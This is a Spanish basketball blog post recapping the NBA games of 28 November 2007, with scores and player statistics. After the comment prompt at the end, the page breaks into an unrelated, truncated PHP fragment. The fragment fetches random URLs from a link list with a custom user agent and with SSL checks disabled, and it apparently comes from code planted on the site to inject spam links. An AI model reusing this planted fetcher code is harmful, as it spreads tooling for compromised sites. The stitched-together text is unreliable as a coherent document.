La crónica (28/11/07)

29 de November de 2007 por MagicJohnson32

Noche sin sorpresas en la NBA. Había dos focos de atención: por un lado, un nuevo encuentro entre Raptors y Grizzlies, con los tres españoles (sanos) saliendo como titulares y entre los destacados de sus respectivos equipos; por otro, el regreso de LeBron James al Palace de Auburn Hills, donde la lió en los pasados Playoffs. Ambos encuentros, sin embargo, carecieron de emoción, el primero por la superioridad de los Raptors y el segundo, por la lesión en un dedo que obligó a James a abandonar el encuentro durante el segundo cuarto. Otro regreso, el de Rashard Lewis a Seattle, tampoco respondió a las expectativas. La pareja Deron & Boozer sigue a lo suyo, los Hawks ofrecieron su cara buena, los Spurs siguen imponiendo su aplastante lógica, los Warriors confirman que han superado la crisis inicial, los Wolves no levantan cabeza ni hay previsión de que eso ocurra, los Pacers dan motivos para los que sospechan de Jermaine y los Rockets ganaron uno de los grandes duelos del Oeste.

Vamos con las crónicas de cada uno de los partidos disputados anoche:
Grizzlies 91 – 103 Raptorscalderongrita

Nuevo Spanish Day o lo que es lo mismo, nuevo enfrentamiento entre Raptors y Grizzlies. Sin Garbajosa, los otros tres internacionales españoles fueron titulares en la cómoda victoria de los canadienses, que fundamentaron su triunfo en un aplastante 10-30 en el segundo cuarto. Calderón brilló de nuevo en ausencia de TJ Ford con 13 puntos, 10 asistencias sin pérdidas y 5 rebotes. Navarro y Gasol fueron, por su parte, los máximos anotadores de los Grizzlies con 15 y 13 puntos respectivamente, pero no pudieron compensar la noche aciaga de Miller (0 de 5) y Gay (2 de 9). Los Raptors mostraron en cambio muchos más recursos, con siete jugadores en dobles figuras en anotación. El mejor fue Anthony Parker, que logró 19 puntos, 8 rebotes y 6 asistencias. El triunfo salió caro a los Raptors, ya que tanto Bosh como Bargnani cayeron lesionados.

Jazz 106 – 95 Sixers

Boozer no sólo hace números espectaculares. Ahora también los hace en los minutos importantes. Anoche logró 12 de sus 26 puntos en el último cuarto para sellar la victoria de los Jazz en el Wachovia Center de Philadelphia ante unos Sixers que dieron guerra liderados por Iguodala. Pese a sufrir molestias en la rodilla que le dificultaban saltar durante la segunda mitad del partido, Boozer mantuvo la impresionante eficacia anotadora que le ha llevado a acertar con más del 70% de sus tiros en los últimos cuatro partidos, en los que ha sumado 44 canastas en 62 intentos. Contar con Deron Williams siempre ayuda: 15 puntos y 15 asistencias logró el base, mientras que Brewer se fue hasta los 19 puntos, Okur hizo 16 (aunque no atrapó ni un solo rebote) y Millsap anotó 10 puntos y cogió 8 rebotes. Por los Sixers, que venían de ganar en Milwaukee, Iguodala consiguió 20-6-4 y otros cuatro jugadores lograron más de 10 puntos. Pero la enorme diferencia en el acierto de cara al aro (un 55% de los Jazz por un 43% de los Sixers) fue demasiada y los de Salt Lake City se anotaron una victoria que eleva su balance a 11-5.

Bucks 80 – 96 Hawks

Claro triunfo de los Hawks sobre los Bucks, que se vieron superados por el repertorio de los jóvenes jugadores del equipo de Georgia. A la anotación de Joe Johnson, autor de 21 puntos, Josh Smith añadió su habitual juego all-around y firmó 10 puntos, 8 rebotes, 7 asistencias, 5 tapones y 3 robos. 14 puntos y 8 rebotes de Pachulia saliendo desde el banco, más 12 puntos de Horford y Childress, y 11 de Lue desmontaron a los Bucks pese a que sus estrellas sí rindieron a buen nivel: 24 puntos de Redd, 23 puntos con 9 de 9 en tiros y 9 asistencias de Mo Williams, y 18-11-4 de Bogut. Pero entre los otro nueve jugadores de los Bucks que tuvieron minutos de juego sólo anotaron 15 puntos. aunque la estadística más espectacular fue la de la aportación de los banquillos: 43 puntos del banquillo de Atlanta por 7 del de Milwaukee.

lebroninjuryCavs 74 – 109 Pistons

Todos las miradas se posaban sobre LeBron. King James volvía al lugar de los hechos, al escenario de aquel quinto partido. El Palacio de Auburn Hills se preparaba para una nueva exhibición como la de los pasados Playoffs o como cualquiera de las que últimamente acostumbra, cual rutina, a firmar LeBron. Sin embargo, una lesión en el dedo índice de la mano izquierda acabó con la participación de la estrella de los Cavs y, por extensión, con la emoción del partido. Los Pistons, liberados del infierno que supone defender a James, no tuvieron piedad de un rival incapaz de reaccionar y que se vio aplastado en la segunda mitad con 31-61 de parcial. Hamilton, McDyess y Prince comandaron el ataque de los de Michigan en un partido que acabó siendo una oportunidad para la rotación más profunda de ambos banquillos.

Wolves 103 – 109 Mavs

El entrenador de Dallas, Avery Johnson, quería evitar a toda costa una cuarta derrota consecutiva, por lo que hizo los cambios necesarios para que no se produjera. Ése es el resumen fundamental de este partido. Johnson no utilizó la táctica de dejar a Jason Terry fuera del quinteto titular para que fuera la pieza fundamental de la segunda unidad y restauró el quinteto que tantas alegrías dio a los aficionados la pasada temporada: Devin Harris (22 puntos y 6 asistencias), Jason Terry (12 puntos) , Josh Howard (12 puntos), Dirk Nowitzky (27 puntos y 11 rebotes) y Eric Dampier (8 puntos y 10 rebotes). Si embargo, es poco probable que Johnson no vuelva a intentarlo. Los de Minnesota, tras su inesperada victoria sobre los Hornets, intentaron sin éxito amargar la vida a los texanos con un gran Al Jefferson, que consiguió su mejor marca anotadora de la temporada, 31 puntos y 14 rebotes, lo que supone su décimo doble doble este año. Junto a él, McCants con 21 puntos y Craig Smith con 17 fueron los mejores de un equipo que con sólo 2 victorias no consigue encontrar el punto para poder inquietar ligeramente a sus rivales.

 

Wizards 94 – 109 Spurs

Los vigentes campeones caminan con paso firme en su casa, donde se mantienen intratables después de 9 encuentros, tras deshacerse esta vez de los renacidos Wizards. La defensa sigue siendo el arma fundamental de unos Spurs que tienen en Bowen a su mejor especialista. En esta ocasión consiguieron dejar a Caron Butler en 16 puntos y a Antawn Jamison en tan sólo 12, cuando ambos estaban promediando cerca de 30 y 25 puntos por partido. Junto a la defensa, los Spurs tiene en su trío atacante un potencial demoledor. En esta ocasión el actor principal fue Tony Parker, que tras anotar tan sólo 10 puntos en la primera mitad, se fue hasta 29 para acabar como máximo anotador del partido. A los puntos hay que añadir las 11 asistencias y 8 rebotes que le dejaron cerca del triple doble. Ginóbili, con 19 puntos, y Duncan, con 16 y 7 rebotes, fueron los acompañantes perfectos.

Rockets 100 – 94 Sunsrocketsbench

Los Phoenix Suns teminan su racha de 5 partidos ganados en casa con una derrota ante unos Rockets que han tenido dos actores principales: Yao Ming, como fuente anotadora, y Steve Francis, como director de juego inesperado. El pívot chino se ha erigido como máximo anotador y reboteador del encuentro, con 31 puntos y 13 rebotes, y ha sido en todo momento una pesadilla para los pívots rivales desplegando una gran variedad de tiros y movimientos. Suyos han sido 8 de los 13 últimos puntos de Houston, cuando los Suns intentaban acercarse en el marcador. Steve Francis, un jugador que está siendo utilizado con cuentagotas por Rick Adelman por decisión conjunta de ambos, ha sido la fuente extra de energía que los Rockets necesitaban para ganar este partido. Francis ha hecho unos números decentes (9 puntos, 3 rebotes, 7 asistencias y 2 tapones) y ha sido capaz de dirigir con acierto a su equipo en los momentos decisivos del encuentro. Por parte de los Suns, tan sólo sus 3 estrellas han aportado algo interesante. Steve Nash ha roto su racha de 8 partidos repartiendo al menos 10 asistencias y se ha quedado en 6, a las que ha añadido 29 puntos para ser el más destacado de su equipo. Junto a él, Amare Stoudemire con 25 puntos y 9 rebotes y Marion con 18 y 9, no han sido suficiente para ganar a los Rockets.

Warriors 103 – 96 Kings

Los Warriors han ganado un partido claramente marcado por los triples. Pese a tener un pésimo porcentaje de tiros de 3 durante todo el encuentro (8 de 31), los de Don Nelson han conseguido ganar gracias a 2 triples mostruosos de Stephen Jackson. Con sólo 1:44 para llegar al final del encuentro los Kings ganaban por 4 puntos depués de 2 tiros libres anotados por Brad Miller dos minutos antes. Sacramento ya no anotaría más. Los 2 jacksonnelsontriples y 5 tiros libres dieron la victoria final a unos Warriors que consiguen empatar su balance de victorias y derrotas a 7, tras un comienzo pésimo de liga. En clave estadística, destacaron los 22 puntos de Monta Ellis, los 19 puntos y 6 asistencias de Baron Davis, los 21 puntos de Jackson y los 13 puntos y 13 rebotes de Biedrins. Por parte de los Kings, sobresalió el regreso a la senda anotadora de Kevin Martin con 28 puntos, 7 rebotes y 7 asistencias, los 21 puntos de Artest y los 18 rebotes de Brad Miller, que ha vuelto de su lesión con ansias de rebotes.

Pacers 95 – 89 Blazers

4 partidos ganados de los 5 que Indiana ha disputado sin su jefe de filas, Jermaine O’Neal. En un equipo con una clara intención de correr, perder al jugador que ralentiza el ataque a veces es bueno. Con un Mike Dunleavy muy acertado, 20 puntos y 11 rebotes, y un Danny Granger que continúa haciendo unos grandes promedios anotadores (23 en este partido), los Pacers han ganado sin grandes dificultades a unos Blazers en los que tan sólo han sobresalido Aldridge con 22 puntos y 9 rebotes y Brandon Roy con 10 puntos, 10 rebotes y 8 asistencias. El equipo de Portland lleva toda la temporada horriblemente dirigido y ninguno de los 3 bases, Blake, Jack y Sergio Rodríguez, parece encontrar la forma de juego que permita a Roy liberarse de las tareas directoras para pasar a facetas más anotadoras.

Magic 110 – 94 Sonics

Era el partido del regreso. Y debió de ser cosa de los nervios, porque Rashard Lewis estuvo negado en su primer partido como visitante en el Key Arena de Seattle. Sin embargo, Dwight Howard se sobró para derrumbar a unosdwightseattle Sonics que tampoco necesitan demasiado para seguir sumando derrotas. 39 puntos con 12 de 17 en tiros de campo y 15 de 20 en libres logró Howard, que añadió 16 rebotes y 5 tapones a su exhibición. No importó que el resto del equipo acompañase poco, en especial Rashard con su 3 de 19 en tiros. Turkoglu, con 15 puntos y 10 rebotes, Bogans, con 14 y JJ Redick, con 11 en 17 minutos, fueron los mejores socios de Dwight. Por los Sonics, el ya habitual muestrario de tiros fallados por Durant, que hizo 6 de 21, estuvo acompañado por el 6 de 20 de Szczerbiak. Ridnour y Collison fueron baja.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>